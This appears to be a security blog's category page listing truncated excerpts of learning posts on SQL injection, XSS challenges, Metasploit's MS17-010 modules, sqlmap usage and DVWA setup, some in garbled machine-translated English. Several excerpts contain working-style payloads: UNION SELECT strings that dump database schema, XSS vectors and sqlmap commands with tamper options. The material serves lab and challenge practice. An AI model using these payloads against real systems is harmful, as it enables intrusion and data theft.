Category:Information Security

  • Notes on Web Security Course: analysis and utilization of SQL vulnerability


    3-1SQLLanguage foundation 3-2ACCESSManual injection What does and1 = 1 mean: enter the database to query information and determine whether there is an injection point. Exists (select * from admin): query statement   3-6 MySQL manual injection     In a logical expression, and takes precedence over or. SqlmapInstallation and setup   If uppercase is the […]

  • MS17 in MSF


    1. Auxiliary / scanner / SMB / SMB ﹐ MS17 ﹐ 010 / / scan detection vulnerability auxiliary module Scanning results show that the vulnerability exists in 2, 3 and 4 hosts! 2. Auxiliary / admin / SMB / MS17? Command / / scan the 445 online host MS17? 010 to exploit the 445 SMB […]

  • 7 common XSS


    1. URL Reflection We can add our own XSS vector / payload when the URL is reflected in the source code in some way. For PHP pages, you can use the slash character (/) to add anything after the page name”>   Leading (“>”) is required to break through the current tag in order […]

  • Multi Reflection (Pro Only)


    Case 14 – Double Injection in HTML Context with Double Quotes”   Case 15 – Double Injection in Mixed Context (HTML + JS) with Default Quotes”   Case 16 – Quoteless Inline Double Injection in JS variables;alert(1)//\     Case 17 – Quoteless Inline Double Injection in JS object};alert(1)//\ Case […]

  • DOM-based XSS Test Cases


    Case 23 – DOM Injection via URL parameter (by server + client)   Case 24 – DOM Injection via URL Parameter (Document Sink)’   Case 25 – DOM Injection via Open Redirection (Location Sink)   Case 26 – DOM Injection via URL Parameter (E Sink)’NASDAQ’’NASDAQ’;alert(1);   Reference resources: […]

  • RFI to RCE challenge

    Time:2020-3-23     Construct payload:  

  • XSS Challenges


    Summary:   Stage #1 payload: alert(document.domain);   Stage #2 Try:alert(document.domain);unsuccessful Input is not closed payload: “>   Stage #3 Note: because all of them are post requests, P1 variable does not exist cross station, P2 variable has problems, so packet capturing is needed ;javascript:alert(document.domain);//  p2=alert(document.domain);   Stage #4 P3 is a hidden […]

  • Challenges-XSS

    Time:2020-3-21   warmup   adobe   JSON  

  • Google XSS Challenge

    Time:2020-3-20 payload: Filtered outKey words

  • Vulnerability test of manual injection after SQL filtering characters (question 1)

    Time:2020-3-18   Analysis topic, belongs to time blind injection, in this case, usually use sqlmap to inject directly, manual syntax is too complex!!!   sqlmap -u “” –tamper charencode,equaltolike,space2comment –current-db ╰─ sqlmap -u “” –tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup –tables   ╰─ sqlmap -u “” –tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member –columns ╰─ sqlmap -u […]

  • SQL injection penetration practice


    Summary:   Determine injection point: and 1=1 #true and 1=2 #false   Number of columns in guessing table +ORDER+BY+06 #true +ORDER+BY+07 #false   Burst field +UNION+ALL+SELECT+1,2,3,4,5,6   Burst database information +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6   Guessing table +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6 Guess the fields of the table +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f7573657273),3,4,5,6   Get field […]

  • Win10 DVWA download installation configuration (novice learning penetration)


    The computer has been reinstalled. You need to reinstall the learning environment DVWA of penetration test. Take this opportunity to tell you about the installation process of DVWA. Because different computer configurations and environments are different, I have installed the DVWA on my computer at one time according to my installation tutorial. If you encounter […]